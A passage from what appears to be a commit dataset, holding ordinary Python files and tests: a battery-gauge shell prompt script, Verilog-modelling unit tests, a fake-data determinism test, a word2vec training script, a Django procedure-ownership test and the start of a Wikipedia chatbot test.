o_max = [l for l in output.splitlines() if 'MaxCapacity' in l][0]
o_cur = [l for l in output.splitlines() if 'CurrentCapacity' in l][0]
b_max = float(o_max.rpartition('=')[-1].strip())
b_cur = float(o_cur.rpartition('=')[-1].strip())
charge = b_cur / b_max
charge_threshold = int(math.ceil(10 * charge))
# Output
total_slots, slots = 10, []
filled = int(math.ceil(charge_threshold * (total_slots / 10.0))) * u'▸'
empty = (total_slots - len(filled)) * u'▹'
out = (filled + empty).encode('utf-8')
import sys
color_green = '%{[32m%}'
color_yellow = '%{[1;33m%}'
color_red = '%{[31m%}'
color_reset = '%{[00m%}'
color_out = (
color_green if len(filled) > 6
else color_yellow if len(filled) > 4
else color_red
)
out = color_out + out + color_reset
sys.stdout.write(out)
|
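For the default ten slots, the gauge math above reduces to ceil(10 * charge) filled triangles. A standalone restatement of that mapping (kept in Python 2 to match the script) can be sanity-checked without ioreg:
# -*- coding: utf-8 -*-
# Standalone restatement of the gauge logic above, testable without ioreg.
import math
def battery_bar(charge, total_slots=10):
    filled = int(math.ceil(charge * total_slots)) * u'▸'
    return filled + (total_slots - len(filled)) * u'▹'
assert battery_bar(1.0) == u'▸' * 10
assert battery_bar(0.0) == u'▹' * 10
print battery_bar(0.42).encode('utf-8')  # 5 filled, 5 empty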
|
f1d5580eac25260236d115edc2bc8dab649b46e0
|
xc7/fasm2bels/tests/test_verilog_modeling.py
|
xc7/fasm2bels/tests/test_verilog_modeling.py
|
import unittest
from fasm2bels.verilog_modeling import Wire, Constant, Bus, NoConnect
class TestVerilogModeling(unittest.TestCase):
def test_connections(self):
self.assertEqual("a", Wire("a").to_string())
self.assertEqual("1'b0", Constant(0).to_string())
self.assertEqual("1'b1", Constant(1).to_string())
self.assertEqual(
"{1'b0, 1'b1}",
Bus([Constant(1), Constant(0)]).to_string()
)
self.assertEqual(
"{a, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string()
)
self.assertEqual("", NoConnect().to_string())
def test_rename(self):
self.assertEqual("b", Wire("a").to_string({'a': 'b'}))
self.assertEqual(
"{b, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string({'a': 'b'})
)
def test_iter_connections(self):
self.assertEqual(list(Wire('a').iter_wires()), [(None, "a")])
self.assertEqual(
list(Bus([Constant(1), Wire('a')]).iter_wires()), [(1, "a")]
)
self.assertEqual(
list(Bus([Wire('b'), Wire('a')]).iter_wires()),
[(0, "b"), (1, "a")]
)
self.assertEqual(list(Constant(0).iter_wires()), [])
self.assertEqual(list(NoConnect().iter_wires()), [])
|
Add test for new connection modelling objects.
|
Add test for new connection modelling objects.
Signed-off-by: Keith Rothman <1bc19627a439baf17510dc2d0b2d250c96d445a5@users.noreply.github.com>
|
Python
|
isc
|
SymbiFlow/symbiflow-arch-defs,SymbiFlow/symbiflow-arch-defs
|
Add test for new connection modelling objects.
Signed-off-by: Keith Rothman <1bc19627a439baf17510dc2d0b2d250c96d445a5@users.noreply.github.com>
|
import unittest
from fasm2bels.verilog_modeling import Wire, Constant, Bus, NoConnect
class TestVerilogModeling(unittest.TestCase):
def test_connections(self):
self.assertEqual("a", Wire("a").to_string())
self.assertEqual("1'b0", Constant(0).to_string())
self.assertEqual("1'b1", Constant(1).to_string())
self.assertEqual(
"{1'b0, 1'b1}",
Bus([Constant(1), Constant(0)]).to_string()
)
self.assertEqual(
"{a, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string()
)
self.assertEqual("", NoConnect().to_string())
def test_rename(self):
self.assertEqual("b", Wire("a").to_string({'a': 'b'}))
self.assertEqual(
"{b, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string({'a': 'b'})
)
def test_iter_connections(self):
self.assertEqual(list(Wire('a').iter_wires()), [(None, "a")])
self.assertEqual(
list(Bus([Constant(1), Wire('a')]).iter_wires()), [(1, "a")]
)
self.assertEqual(
list(Bus([Wire('b'), Wire('a')]).iter_wires()),
[(0, "b"), (1, "a")]
)
self.assertEqual(list(Constant(0).iter_wires()), [])
self.assertEqual(list(NoConnect().iter_wires()), [])
|
<commit_before><commit_msg>Add test for new connection modelling objects.
Signed-off-by: Keith Rothman <1bc19627a439baf17510dc2d0b2d250c96d445a5@users.noreply.github.com><commit_after>
|
import unittest
from fasm2bels.verilog_modeling import Wire, Constant, Bus, NoConnect
class TestVerilogModeling(unittest.TestCase):
def test_connections(self):
self.assertEqual("a", Wire("a").to_string())
self.assertEqual("1'b0", Constant(0).to_string())
self.assertEqual("1'b1", Constant(1).to_string())
self.assertEqual(
"{1'b0, 1'b1}",
Bus([Constant(1), Constant(0)]).to_string()
)
self.assertEqual(
"{a, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string()
)
self.assertEqual("", NoConnect().to_string())
def test_rename(self):
self.assertEqual("b", Wire("a").to_string({'a': 'b'}))
self.assertEqual(
"{b, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string({'a': 'b'})
)
def test_iter_connections(self):
self.assertEqual(list(Wire('a').iter_wires()), [(None, "a")])
self.assertEqual(
list(Bus([Constant(1), Wire('a')]).iter_wires()), [(1, "a")]
)
self.assertEqual(
list(Bus([Wire('b'), Wire('a')]).iter_wires()),
[(0, "b"), (1, "a")]
)
self.assertEqual(list(Constant(0).iter_wires()), [])
self.assertEqual(list(NoConnect().iter_wires()), [])
|
Add test for new connection modelling objects.
Signed-off-by: Keith Rothman <1bc19627a439baf17510dc2d0b2d250c96d445a5@users.noreply.github.com>import unittest
from fasm2bels.verilog_modeling import Wire, Constant, Bus, NoConnect
class TestVerilogModeling(unittest.TestCase):
def test_connections(self):
self.assertEqual("a", Wire("a").to_string())
self.assertEqual("1'b0", Constant(0).to_string())
self.assertEqual("1'b1", Constant(1).to_string())
self.assertEqual(
"{1'b0, 1'b1}",
Bus([Constant(1), Constant(0)]).to_string()
)
self.assertEqual(
"{a, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string()
)
self.assertEqual("", NoConnect().to_string())
def test_rename(self):
self.assertEqual("b", Wire("a").to_string({'a': 'b'}))
self.assertEqual(
"{b, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string({'a': 'b'})
)
def test_iter_connections(self):
self.assertEqual(list(Wire('a').iter_wires()), [(None, "a")])
self.assertEqual(
list(Bus([Constant(1), Wire('a')]).iter_wires()), [(1, "a")]
)
self.assertEqual(
list(Bus([Wire('b'), Wire('a')]).iter_wires()),
[(0, "b"), (1, "a")]
)
self.assertEqual(list(Constant(0).iter_wires()), [])
self.assertEqual(list(NoConnect().iter_wires()), [])
|
<commit_before><commit_msg>Add test for new connection modelling objects.
Signed-off-by: Keith Rothman <1bc19627a439baf17510dc2d0b2d250c96d445a5@users.noreply.github.com><commit_after>import unittest
from fasm2bels.verilog_modeling import Wire, Constant, Bus, NoConnect
class TestVerilogModeling(unittest.TestCase):
def test_connections(self):
self.assertEqual("a", Wire("a").to_string())
self.assertEqual("1'b0", Constant(0).to_string())
self.assertEqual("1'b1", Constant(1).to_string())
self.assertEqual(
"{1'b0, 1'b1}",
Bus([Constant(1), Constant(0)]).to_string()
)
self.assertEqual(
"{a, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string()
)
self.assertEqual("", NoConnect().to_string())
def test_rename(self):
self.assertEqual("b", Wire("a").to_string({'a': 'b'}))
self.assertEqual(
"{b, 1'b1}",
Bus([Constant(1), Wire('a')]).to_string({'a': 'b'})
)
def test_iter_connections(self):
self.assertEqual(list(Wire('a').iter_wires()), [(None, "a")])
self.assertEqual(
list(Bus([Constant(1), Wire('a')]).iter_wires()), [(1, "a")]
)
self.assertEqual(
list(Bus([Wire('b'), Wire('a')]).iter_wires()),
[(0, "b"), (1, "a")]
)
self.assertEqual(list(Constant(0).iter_wires()), [])
self.assertEqual(list(NoConnect().iter_wires()), [])
|
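Assuming the fasm2bels package is importable from the working directory, as the import above implies, the suite can also be driven programmatically; a sketch:
# Hypothetical runner for the test case above; roughly equivalent to
#   python -m unittest fasm2bels.tests.test_verilog_modeling
import unittest
from fasm2bels.tests.test_verilog_modeling import TestVerilogModeling
suite = unittest.TestLoader().loadTestsFromTestCase(TestVerilogModeling)
unittest.TextTestRunner(verbosity=2).run(suite)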
|
4fd92cba5dce2241663a36ddb765bb2052715921
|
yunity/tests/unit/test__utils_tests__fake.py
|
yunity/tests/unit/test__utils_tests__fake.py
|
from yunity.utils.tests.abc import BaseTestCase
from yunity.utils.tests.fake import faker as default_faker, Faker
from yunity.utils.validation import Validator, OfType, HasKey, IsReasonableLengthString
class ValidLocation(Validator):
def __call__(self, location):
(HasKey('description') & IsReasonableLengthString())(location)
(HasKey('latitude') & OfType(float))(location)
(HasKey('longitude') & OfType(float))(location)
class FakerTestCase(BaseTestCase):
def test_faker_creates_fake_locations(self):
self.given_data()
self.when_calling(default_faker.location)
self.then_invocation_passed_with(ValidLocation())
def test_faker_is_deterministic(self):
self.given_new_faker()
self.when_creating_fake_data()
self.given_new_faker()
self.when_creating_fake_data()
self.then_fake_data_matches()
def setUp(self):
super().setUp()
self.faker = None
self.fake_data = []
def given_new_faker(self):
del self.faker
self.faker = Faker()
def when_creating_fake_data(self, with_method='name', num_data=10):
fake_data = [getattr(self.faker, with_method)() for _ in range(num_data)]
self.fake_data.append(fake_data)
def then_fake_data_matches(self):
for fake_data in self.fake_data:
self.assertEqual(fake_data, self.fake_data[0])
|
Add test for fake data generation
|
Add test for fake data generation
|
Python
|
agpl-3.0
|
yunity/foodsaving-backend,yunity/foodsaving-backend,yunity/yunity-core,yunity/foodsaving-backend,yunity/yunity-core
|
Add test for fake data generation
|
from yunity.utils.tests.abc import BaseTestCase
from yunity.utils.tests.fake import faker as default_faker, Faker
from yunity.utils.validation import Validator, OfType, HasKey, IsReasonableLengthString
class ValidLocation(Validator):
def __call__(self, location):
(HasKey('description') & IsReasonableLengthString())(location)
(HasKey('latitude') & OfType(float))(location)
(HasKey('longitude') & OfType(float))(location)
class FakerTestCase(BaseTestCase):
def test_faker_creates_fake_locations(self):
self.given_data()
self.when_calling(default_faker.location)
self.then_invocation_passed_with(ValidLocation())
def test_faker_is_deterministic(self):
self.given_new_faker()
self.when_creating_fake_data()
self.given_new_faker()
self.when_creating_fake_data()
self.then_fake_data_matches()
def setUp(self):
super().setUp()
self.faker = None
self.fake_data = []
def given_new_faker(self):
del self.faker
self.faker = Faker()
def when_creating_fake_data(self, with_method='name', num_data=10):
fake_data = [getattr(self.faker, with_method)() for _ in range(num_data)]
self.fake_data.append(fake_data)
def then_fake_data_matches(self):
for fake_data in self.fake_data:
self.assertEqual(fake_data, self.fake_data[0])
|
<commit_before><commit_msg>Add test for fake data generation<commit_after>
|
from yunity.utils.tests.abc import BaseTestCase
from yunity.utils.tests.fake import faker as default_faker, Faker
from yunity.utils.validation import Validator, OfType, HasKey, IsReasonableLengthString
class ValidLocation(Validator):
def __call__(self, location):
(HasKey('description') & IsReasonableLengthString())(location)
(HasKey('latitude') & OfType(float))(location)
(HasKey('longitude') & OfType(float))(location)
class FakerTestCase(BaseTestCase):
def test_faker_creates_fake_locations(self):
self.given_data()
self.when_calling(default_faker.location)
self.then_invocation_passed_with(ValidLocation())
def test_faker_is_deterministic(self):
self.given_new_faker()
self.when_creating_fake_data()
self.given_new_faker()
self.when_creating_fake_data()
self.then_fake_data_matches()
def setUp(self):
super().setUp()
self.faker = None
self.fake_data = []
def given_new_faker(self):
del self.faker
self.faker = Faker()
def when_creating_fake_data(self, with_method='name', num_data=10):
fake_data = [getattr(self.faker, with_method)() for _ in range(num_data)]
self.fake_data.append(fake_data)
def then_fake_data_matches(self):
for fake_data in self.fake_data:
self.assertEqual(fake_data, self.fake_data[0])
|
Add test for fake data generationfrom yunity.utils.tests.abc import BaseTestCase
from yunity.utils.tests.fake import faker as default_faker, Faker
from yunity.utils.validation import Validator, OfType, HasKey, IsReasonableLengthString
class ValidLocation(Validator):
def __call__(self, location):
(HasKey('description') & IsReasonableLengthString())(location)
(HasKey('latitude') & OfType(float))(location)
(HasKey('longitude') & OfType(float))(location)
class FakerTestCase(BaseTestCase):
def test_faker_creates_fake_locations(self):
self.given_data()
self.when_calling(default_faker.location)
self.then_invocation_passed_with(ValidLocation())
def test_faker_is_deterministic(self):
self.given_new_faker()
self.when_creating_fake_data()
self.given_new_faker()
self.when_creating_fake_data()
self.then_fake_data_matches()
def setUp(self):
super().setUp()
self.faker = None
self.fake_data = []
def given_new_faker(self):
del self.faker
self.faker = Faker()
def when_creating_fake_data(self, with_method='name', num_data=10):
fake_data = [getattr(self.faker, with_method)() for _ in range(num_data)]
self.fake_data.append(fake_data)
def then_fake_data_matches(self):
for fake_data in self.fake_data:
self.assertEqual(fake_data, self.fake_data[0])
|
<commit_before><commit_msg>Add test for fake data generation<commit_after>from yunity.utils.tests.abc import BaseTestCase
from yunity.utils.tests.fake import faker as default_faker, Faker
from yunity.utils.validation import Validator, OfType, HasKey, IsReasonableLengthString
class ValidLocation(Validator):
def __call__(self, location):
(HasKey('description') & IsReasonableLengthString())(location)
(HasKey('latitude') & OfType(float))(location)
(HasKey('longitude') & OfType(float))(location)
class FakerTestCase(BaseTestCase):
def test_faker_creates_fake_locations(self):
self.given_data()
self.when_calling(default_faker.location)
self.then_invocation_passed_with(ValidLocation())
def test_faker_is_deterministic(self):
self.given_new_faker()
self.when_creating_fake_data()
self.given_new_faker()
self.when_creating_fake_data()
self.then_fake_data_matches()
def setUp(self):
super().setUp()
self.faker = None
self.fake_data = []
def given_new_faker(self):
del self.faker
self.faker = Faker()
def when_creating_fake_data(self, with_method='name', num_data=10):
fake_data = [getattr(self.faker, with_method)() for _ in range(num_data)]
self.fake_data.append(fake_data)
def then_fake_data_matches(self):
for fake_data in self.fake_data:
self.assertEqual(fake_data, self.fake_data[0])
|
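The determinism test presumably relies on yunity's Faker wrapper seeding its generator on construction. The same idea in isolation, using the public faker package rather than the wrapper (seed_instance assumes a reasonably recent faker release):
# Illustration only: deterministic fake data via a fixed seed, using the
# public `faker` package rather than yunity's wrapper.
from faker import Faker
def fake_names(seed=1234, n=10):
    f = Faker()
    f.seed_instance(seed)  # same seed -> same sequence of names
    return [f.name() for _ in range(n)]
assert fake_names() == fake_names()  # two identically-seeded fakers agree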
|
186aef390cd3c35c4b5f450951cd7001fa63d5ff
|
train_word2vec.py
|
train_word2vec.py
|
from __future__ import print_function
import sys
import os
import logging
from nltk.tokenize import sent_tokenize, word_tokenize
from gensim.models import Word2Vec
logging.basicConfig(level=logging.INFO)
class Word2VecCorpus():
def __init__(self, basedir):
self.basedir = basedir
def __iter__(self):
for person in os.listdir(self.basedir):
docs_dir = os.path.join(self.basedir, person, 'all_documents')
for f in os.listdir(docs_dir):
text = open(os.path.join(docs_dir, f)).read()
sentences = sent_tokenize(text)
for s in sentences:
yield [w.lower() for w in word_tokenize(s)]
try:
basedir, outfile = sys.argv[1:]
except Exception:
print("usage: %s dir outfile"
% sys.argv[0], file=sys.stderr)
sys.exit(1)
model = Word2Vec(Word2VecCorpus(basedir), size=100, window=5, min_count=5,
workers=4)
model.save(outfile)
|
Add script to train a word2vec model
|
Add script to train a word2vec model
|
Python
|
apache-2.0
|
nlesc-sherlock/concept-search,nlesc-sherlock/concept-search,nlesc-sherlock/concept-search,nlesc-sherlock/concept-search
|
Add script to train a word2vec model
|
from __future__ import print_function
import sys
import os
import logging
from nltk.tokenize import sent_tokenize, word_tokenize
from gensim.models import Word2Vec
logging.basicConfig(level=logging.INFO)
class Word2VecCorpus():
def __init__(self, basedir):
self.basedir = basedir
def __iter__(self):
for person in os.listdir(self.basedir):
docs_dir = os.path.join(self.basedir, person, 'all_documents')
for f in os.listdir(docs_dir):
text = open(os.path.join(docs_dir, f)).read()
sentences = sent_tokenize(text)
for s in sentences:
yield [w.lower() for w in word_tokenize(s)]
try:
basedir, outfile = sys.argv[1:]
except Exception:
print("usage: %s dir outfile"
% sys.argv[0], file=sys.stderr)
sys.exit(1)
model = Word2Vec(Word2VecCorpus(basedir), size=100, window=5, min_count=5,
workers=4)
model.save(outfile)
|
<commit_before><commit_msg>Add script to train a word2vec model<commit_after>
|
from __future__ import print_function
import sys
import os
import logging
from nltk.tokenize import sent_tokenize, word_tokenize
from gensim.models import Word2Vec
logging.basicConfig(level=logging.INFO)
class Word2VecCorpus():
def __init__(self, basedir):
self.basedir = basedir
def __iter__(self):
for person in os.listdir(self.basedir):
docs_dir = os.path.join(self.basedir, person, 'all_documents')
for f in os.listdir(docs_dir):
text = open(os.path.join(docs_dir, f)).read()
sentences = sent_tokenize(text)
for s in sentences:
yield [w.lower() for w in word_tokenize(s)]
try:
basedir, outfile = sys.argv[1:]
except Exception:
print("usage: %s dir outfile"
% sys.argv[0], file=sys.stderr)
sys.exit(1)
model = Word2Vec(Word2VecCorpus(basedir), size=100, window=5, min_count=5,
workers=4)
model.save(outfile)
|
Add script to train a word2vec modelfrom __future__ import print_function
import sys
import os
import logging
from nltk.tokenize import sent_tokenize, word_tokenize
from gensim.models import Word2Vec
logging.basicConfig(level=logging.INFO)
class Word2VecCorpus():
def __init__(self, basedir):
self.basedir = basedir
def __iter__(self):
for person in os.listdir(self.basedir):
docs_dir = os.path.join(self.basedir, person, 'all_documents')
for f in os.listdir(docs_dir):
text = open(os.path.join(docs_dir, f)).read()
sentences = sent_tokenize(text)
for s in sentences:
yield [w.lower() for w in word_tokenize(s)]
try:
basedir, outfile = sys.argv[1:]
except Exception:
print("usage: %s dir outfile"
% sys.argv[0], file=sys.stderr)
sys.exit(1)
model = Word2Vec(Word2VecCorpus(basedir), size=100, window=5, min_count=5,
workers=4)
model.save(outfile)
|
<commit_before><commit_msg>Add script to train a word2vec model<commit_after>from __future__ import print_function
import sys
import os
import logging
from nltk.tokenize import sent_tokenize, word_tokenize
from gensim.models import Word2Vec
logging.basicConfig(level=logging.INFO)
class Word2VecCorpus():
def __init__(self, basedir):
self.basedir = basedir
def __iter__(self):
for person in os.listdir(self.basedir):
docs_dir = os.path.join(self.basedir, person, 'all_documents')
for f in os.listdir(docs_dir):
text = open(os.path.join(docs_dir, f)).read()
sentences = sent_tokenize(text)
for s in sentences:
yield [w.lower() for w in word_tokenize(s)]
try:
basedir, outfile = sys.argv[1:]
except Exception:
print("usage: %s dir outfile"
% sys.argv[0], file=sys.stderr)
sys.exit(1)
model = Word2Vec(Word2VecCorpus(basedir), size=100, window=5, min_count=5,
workers=4)
model.save(outfile)
|
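Once trained, the saved model can be reloaded and queried. A sketch assuming the old gensim API used above (size=, most_similar on the model itself) and an example output path of enron.w2v:
# Hypothetical follow-up: reload the model saved above and inspect it.
from gensim.models import Word2Vec
model = Word2Vec.load('enron.w2v')  # 'enron.w2v' is an example outfile
print(model.most_similar('python', topn=5))  # nearest terms by cosine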
|
8c095383bf7b64112b86d32ebf8feb448416a6c7
|
src-backend/api/tests/test_procedures.py
|
src-backend/api/tests/test_procedures.py
|
from django.test import TestCase, Client
from rest_framework import status
from rest_framework.authtoken.models import Token
from nose.tools import assert_equals, assert_true
from utils.decorators import initialize_permissions
from utils.helpers import add_token_to_header
from utils import factories
import json
class ProcedureTest(TestCase):
def setUp(self):
self.client = Client()
self.token = Token.objects.get(user=factories.UserFactory())
self.procedure_url = '/api/procedures/'
self.data = {
"title": "Example Title",
"author": "An Author"
}
@initialize_permissions
def test_created_procedure_has_correct_owner(self):
user = factories.UserFactory()
response = self.client.post(
path=self.procedure_url,
data=json.dumps(self.data),
content_type='application/json',
HTTP_AUTHORIZATION=add_token_to_header(user, self.token)
)
assert_equals(response.status_code, status.HTTP_200_OK)
body = json.loads(response.content)
assert_true('owner' in body)
assert_equals(body['owner'], user.id)
|
Add test for ensuring procedures have the correct owner
|
Add test for ensuring procedures have the correct owner
|
Python
|
bsd-3-clause
|
SanaMobile/sana.protocol_builder,SanaMobile/sana.protocol_builder,SanaMobile/sana.protocol_builder,SanaMobile/sana.protocol_builder,SanaMobile/sana.protocol_builder
|
Add test for ensuring procedures have the correct owner
|
from django.test import TestCase, Client
from rest_framework import status
from rest_framework.authtoken.models import Token
from nose.tools import assert_equals, assert_true
from utils.decorators import initialize_permissions
from utils.helpers import add_token_to_header
from utils import factories
import json
class ProcedureTest(TestCase):
def setUp(self):
self.client = Client()
self.token = Token.objects.get(user=factories.UserFactory())
self.procedure_url = '/api/procedures/'
self.data = {
"title": "Example Title",
"author": "An Author"
}
@initialize_permissions
def test_created_procedure_has_correct_owner(self):
user = factories.UserFactory()
response = self.client.post(
path=self.procedure_url,
data=json.dumps(self.data),
content_type='application/json',
HTTP_AUTHORIZATION=add_token_to_header(user, self.token)
)
assert_equals(response.status_code, status.HTTP_200_OK)
body = json.loads(response.content)
assert_true('owner' in body)
assert_equals(body['owner'], user.id)
|
<commit_before><commit_msg>Add test for ensuring procedures have the correct owner<commit_after>
|
from django.test import TestCase, Client
from rest_framework import status
from rest_framework.authtoken.models import Token
from nose.tools import assert_equals, assert_true
from utils.decorators import initialize_permissions
from utils.helpers import add_token_to_header
from utils import factories
import json
class ProcedureTest(TestCase):
def setUp(self):
self.client = Client()
self.token = Token.objects.get(user=factories.UserFactory())
self.procedure_url = '/api/procedures/'
self.data = {
"title": "Example Title",
"author": "An Author"
}
@initialize_permissions
def test_created_procedure_has_correct_owner(self):
user = factories.UserFactory()
response = self.client.post(
path=self.procedure_url,
data=json.dumps(self.data),
content_type='application/json',
HTTP_AUTHORIZATION=add_token_to_header(user, self.token)
)
assert_equals(response.status_code, status.HTTP_200_OK)
body = json.loads(response.content)
assert_true('owner' in body)
assert_equals(body['owner'], user.id)
|
Add test for ensuring procedures have the correct ownerfrom django.test import TestCase, Client
from rest_framework import status
from rest_framework.authtoken.models import Token
from nose.tools import assert_equals, assert_true
from utils.decorators import initialize_permissions
from utils.helpers import add_token_to_header
from utils import factories
import json
class ProcedureTest(TestCase):
def setUp(self):
self.client = Client()
self.token = Token.objects.get(user=factories.UserFactory())
self.procedure_url = '/api/procedures/'
self.data = {
"title": "Example Title",
"author": "An Author"
}
@initialize_permissions
def test_created_procedure_has_correct_owner(self):
user = factories.UserFactory()
response = self.client.post(
path=self.procedure_url,
data=json.dumps(self.data),
content_type='application/json',
HTTP_AUTHORIZATION=add_token_to_header(user, self.token)
)
assert_equals(response.status_code, status.HTTP_200_OK)
body = json.loads(response.content)
assert_true('owner' in body)
assert_equals(body['owner'], user.id)
|
<commit_before><commit_msg>Add test for ensuring procedures have the correct owner<commit_after>from django.test import TestCase, Client
from rest_framework import status
from rest_framework.authtoken.models import Token
from nose.tools import assert_equals, assert_true
from utils.decorators import initialize_permissions
from utils.helpers import add_token_to_header
from utils import factories
import json
class ProcedureTest(TestCase):
def setUp(self):
self.client = Client()
self.token = Token.objects.get(user=factories.UserFactory())
self.procedure_url = '/api/procedures/'
self.data = {
"title": "Example Title",
"author": "An Author"
}
@initialize_permissions
def test_created_procedure_has_correct_owner(self):
user = factories.UserFactory()
response = self.client.post(
path=self.procedure_url,
data=json.dumps(self.data),
content_type='application/json',
HTTP_AUTHORIZATION=add_token_to_header(user, self.token)
)
assert_equals(response.status_code, status.HTTP_200_OK)
body = json.loads(response.content)
assert_true('owner' in body)
assert_equals(body['owner'], user.id)
|
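The test implies the API derives owner from the authenticated request rather than trusting the payload. In Django REST Framework that is conventionally done in perform_create; a generic sketch, not SanaMobile's actual view code:
# Generic DRF pattern the test above exercises (illustrative only).
from rest_framework import viewsets
class ProcedureViewSet(viewsets.ModelViewSet):
    def perform_create(self, serializer):
        # Ignore any client-supplied owner; bind to the requesting user.
        serializer.save(owner=self.request.user)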
|
601d0183674b555c231954dbf92955e8d8918d0a
|
contrib_bots/bots/wikipedia/test_wikipedia.py
|
contrib_bots/bots/wikipedia/test_wikipedia.py
|
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
our_dir = os.path.dirname(os.path.abspath(__file__))
# For dev setups, we can find the API in the repo itself.
if os.path.exists(os.path.join(our_dir, '..')):
sys.path.insert(0, '..')
from bots_test_lib import BotTestCase
class TestWikipediaBot(BotTestCase):
bot_name = "wikipedia"
def test_bot(self):
self.assert_bot_output(
{'content': "foo", 'type': "private", 'sender_email': "foo"},
'For search term "foo", https://en.wikipedia.org/wiki/Foobar'
)
self.assert_bot_output(
{'content': "", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'Please enter your message after @mention-bot'
)
self.assert_bot_output(
{'content': "sssssss kkkkk", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'I am sorry. The search term you provided is not found :slightly_frowning_face:'
)
self.assert_bot_output(
{'content': "123", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'For search term "123", https://en.wikipedia.org/wiki/123'
)
|
Add tests for wikipedia bot in contrib_bots.
|
testsuite: Add tests for wikipedia bot in contrib_bots.
Add test file 'Test_wikipedia.py'.
Since wikipedia links for the same query may differ according
to relevance, this test should eventually be written by mocking HTTP
traffic, but this can work for now.
|
Python
|
apache-2.0
|
jackrzhang/zulip,verma-varsha/zulip,brockwhittaker/zulip,rishig/zulip,vaidap/zulip,andersk/zulip,dhcrzf/zulip,zulip/zulip,shubhamdhama/zulip,showell/zulip,jrowan/zulip,Galexrt/zulip,rht/zulip,timabbott/zulip,rht/zulip,rishig/zulip,shubhamdhama/zulip,hackerkid/zulip,vabs22/zulip,zulip/zulip,andersk/zulip,kou/zulip,rishig/zulip,verma-varsha/zulip,jrowan/zulip,Galexrt/zulip,rht/zulip,vaidap/zulip,kou/zulip,Galexrt/zulip,vaidap/zulip,synicalsyntax/zulip,jackrzhang/zulip,brainwane/zulip,synicalsyntax/zulip,punchagan/zulip,vaidap/zulip,zulip/zulip,rishig/zulip,synicalsyntax/zulip,shubhamdhama/zulip,Galexrt/zulip,tommyip/zulip,zulip/zulip,synicalsyntax/zulip,rishig/zulip,tommyip/zulip,verma-varsha/zulip,andersk/zulip,eeshangarg/zulip,kou/zulip,dhcrzf/zulip,brockwhittaker/zulip,amanharitsh123/zulip,jrowan/zulip,andersk/zulip,tommyip/zulip,brainwane/zulip,eeshangarg/zulip,andersk/zulip,vabs22/zulip,brainwane/zulip,andersk/zulip,showell/zulip,jackrzhang/zulip,punchagan/zulip,Galexrt/zulip,jackrzhang/zulip,mahim97/zulip,showell/zulip,dhcrzf/zulip,timabbott/zulip,mahim97/zulip,timabbott/zulip,showell/zulip,kou/zulip,eeshangarg/zulip,timabbott/zulip,timabbott/zulip,shubhamdhama/zulip,kou/zulip,dhcrzf/zulip,eeshangarg/zulip,Galexrt/zulip,vabs22/zulip,amanharitsh123/zulip,rht/zulip,hackerkid/zulip,zulip/zulip,brockwhittaker/zulip,synicalsyntax/zulip,amanharitsh123/zulip,showell/zulip,eeshangarg/zulip,shubhamdhama/zulip,showell/zulip,verma-varsha/zulip,hackerkid/zulip,vaidap/zulip,jrowan/zulip,jackrzhang/zulip,punchagan/zulip,rishig/zulip,kou/zulip,dhcrzf/zulip,jackrzhang/zulip,eeshangarg/zulip,punchagan/zulip,brockwhittaker/zulip,eeshangarg/zulip,jackrzhang/zulip,vabs22/zulip,zulip/zulip,punchagan/zulip,showell/zulip,rht/zulip,vabs22/zulip,tommyip/zulip,hackerkid/zulip,verma-varsha/zulip,synicalsyntax/zulip,amanharitsh123/zulip,kou/zulip,shubhamdhama/zulip,brainwane/zulip,vabs22/zulip,amanharitsh123/zulip,rht/zulip,punchagan/zulip,tommyip/zulip,synicalsyntax/zulip,jrowan/zulip,vaidap/zulip,dhcrzf/zulip,verma-varsha/zulip,timabbott/zulip,brainwane/zulip,shubhamdhama/zulip,jrowan/zulip,brainwane/zulip,rishig/zulip,rht/zulip,tommyip/zulip,hackerkid/zulip,punchagan/zulip,Galexrt/zulip,mahim97/zulip,timabbott/zulip,hackerkid/zulip,brainwane/zulip,brockwhittaker/zulip,brockwhittaker/zulip,amanharitsh123/zulip,dhcrzf/zulip,mahim97/zulip,tommyip/zulip,mahim97/zulip,hackerkid/zulip,zulip/zulip,mahim97/zulip,andersk/zulip
|
testsuite: Add tests for wikipedia bot in contrib_bots.
Add test file 'Test_wikipedia.py'.
Since wikipedia links for the same query may differ according
to relevance, this test should eventually be written by mocking HTTP
traffic, but this can work for now.
|
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
our_dir = os.path.dirname(os.path.abspath(__file__))
# For dev setups, we can find the API in the repo itself.
if os.path.exists(os.path.join(our_dir, '..')):
sys.path.insert(0, '..')
from bots_test_lib import BotTestCase
class TestWikipediaBot(BotTestCase):
bot_name = "wikipedia"
def test_bot(self):
self.assert_bot_output(
{'content': "foo", 'type': "private", 'sender_email': "foo"},
'For search term "foo", https://en.wikipedia.org/wiki/Foobar'
)
self.assert_bot_output(
{'content': "", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'Please enter your message after @mention-bot'
)
self.assert_bot_output(
{'content': "sssssss kkkkk", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'I am sorry. The search term you provided is not found :slightly_frowning_face:'
)
self.assert_bot_output(
{'content': "123", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'For search term "123", https://en.wikipedia.org/wiki/123'
)
|
<commit_before><commit_msg>testsuite: Add tests for wikipedia bot in contrib_bots.
Add test file 'Test_wikipedia.py'.
Since wikipedia links for the same query may differ according
to relevance, this test should eventually be written by mocking HTTP
traffic, but this can work for now.<commit_after>
|
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
our_dir = os.path.dirname(os.path.abspath(__file__))
# For dev setups, we can find the API in the repo itself.
if os.path.exists(os.path.join(our_dir, '..')):
sys.path.insert(0, '..')
from bots_test_lib import BotTestCase
class TestWikipediaBot(BotTestCase):
bot_name = "wikipedia"
def test_bot(self):
self.assert_bot_output(
